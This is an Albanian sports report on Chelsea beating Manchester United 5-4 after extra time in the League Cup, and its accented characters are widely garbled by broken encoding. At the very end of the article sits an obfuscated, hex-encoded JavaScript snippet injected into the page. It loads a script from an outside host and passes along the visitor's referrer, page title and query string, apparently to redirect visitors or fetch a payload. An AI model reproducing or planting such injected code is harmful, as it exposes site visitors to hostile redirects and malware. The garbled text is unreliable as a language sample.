hazard2

Hakmerret Chelsea

Chelsea dhe Manchester Unitedi kanA� zhvilluar njA� sfidA� mbresA�lA�nA�se tA� vlefshme pA�r League Cup. BlutA� kanA� arritur tA� hakmerren nA� Stamford Bridge duke fituar me rezultat 5-4.

Pas njA� fillimi tA� baraspeshuar tA� ndeshjes, mbrojtja vendase bA�ri njA� gabim fatal. Portieri Cech pasoi nA� afA�rsi te Romeu, tA� cilit ia mori topin Anderson dhe pasoi te Ryan Giggs. Mesfushori veteran heshti tifozA�t vendas (22a��).

Nuk kaluan shumA� minuta dhe arbitri akordoi penalti nA� favor tA� Bluve. David Luiz ishte i saktA� pA�r ta��i barazuar shifrat (31a��).

I njA�jti futbollist ishte fajtor pA�r golin e dytA� tA� United. Luiz e humbi topin nA� mesfushA�, Anderson e gjeti pA�r mrekulli Javier ‘Chicharito’ Hernandezin, i cili e ktheu epA�rsinA� e Djajve tA� Kuq (43a��) dhe ky ishte rezultati i pjesA�s sA� parA�.

FutbollistA�t me fanellat e kaltra e filluan furishA�m pjesA�n e dytA� duke e barazuar serish rezultatin. NjA� harkim nga kA�ndi tA� Matas e priti nA� zonA� Gary Cahill qA� me kokA� goditi nA� portA�. Rafael e nxori topin, por pasi kishte kaluar vijA�n fatale (52a��).

MirA�po, mysafirA�t nuk lejuan qA� tA� zgjaste gA�zimi i vendasve. NjA� bashkA�punim i bukur i Nanit dhe Anderson, bA�ri qA� anA�sori portugez ta rikthente epA�rsinA� e United (59a��).

NA� vazhdim, BlutA� e kA�rkuan me ngulm golin qA� sA� paku ta dA�rgonin ndeshjen nA� vazhdime. Angazhimi maksimal i vendasve u shpagua kur Ramires u ndal nA� mA�nyrA� tA� gabuar nA� zonA�. Eden Hazard e shA�noi golin qA� dA�rgonte sfidA�n nA� vazhdime (90a��+4).

Paraqitjen e pA�rkushtuar tA� lojtarA�ve vendas e konfirmoi Daniel Sturridge, i cili shA�noi golin e epA�rsisA� (97a��) pA�r herA� tA� parA� pA�r BlutA� nA� kA�tA� ndeshje tA� stA�rzgjatur.

Dhe pA�r eliminimin e sigurt tA� Manchester Unitedit nga Kupa e LigA�s u pA�rkujdes Ramires (116a��).

 

NdA�rkohA� qA� nA� fund tA� vazhdimeve, mysafirA�t realizuan edhe njA� herA� me anA� tA� Ryan Giggs nga penaltia (120a��).var _0x31f1=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}